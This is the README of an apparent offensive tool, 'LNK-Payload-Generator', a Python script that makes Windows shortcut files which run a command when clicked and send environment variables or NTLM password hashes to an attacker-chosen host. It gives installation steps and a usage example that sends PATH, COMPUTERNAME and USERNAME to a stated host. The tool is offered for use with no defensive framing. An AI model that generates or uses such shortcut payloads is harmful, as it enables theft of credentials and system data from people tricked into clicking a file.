LNK-Payload-Generator is a Python script that generates Windows shortcut files (LNK) with specific commands and configurations. These shortcuts can exfiltrate data or execute specific commands when clicked.
- Generate LNK files for both Windows and non-Windows systems
- Customize the command to execute upon clicking the shortcut
- Exfiltrate specified environment variables or NTLM password hashes
- Supports English, Russian, and Chinese languages
- Python 3.x
- For Windows:
pywin32
module - For non-Windows:
pylnk
module
-
Clone the repository:
git clone https://github.com/your-username/LNK-Payload-Generator.git cd LNK-Payload-Generator
-
Install the required modules:
pip install -r requirements.txt
-
Run the script with the desired options:
python Lnk-Gen.py --lang <language> --host <host> --output <output.lnk> [--execute <command>] [--vars <variables>] [--type <type>]
-
Example:
python Lnk-Gen.py --lang en --host example.com --output payload.lnk --execute "notepad.exe" --vars "PATH,COMPUTERNAME,USERNAME" --type environment
--lang
: Choose language: en, ru, zh--host
: Where should we send our data?--output
: The name of the lnk file--execute
: Command to execute when the shortcut is clicked (default:C:\Windows\explorer.exe .
)--vars
: Variables to exfiltrate, e.g., "PATH,COMPUTERNAME,USERNAME,NUMBER_OF_PROCESSORS"--type
: Payload type to generate (choices:environment
,ntlm
,all
)
Detailed documentation is available in the docs
folder.
This project is licensed under the MIT License - see the LICENSE file for details.
Contributions are welcome! Please read the CONTRIBUTING.md for guidelines.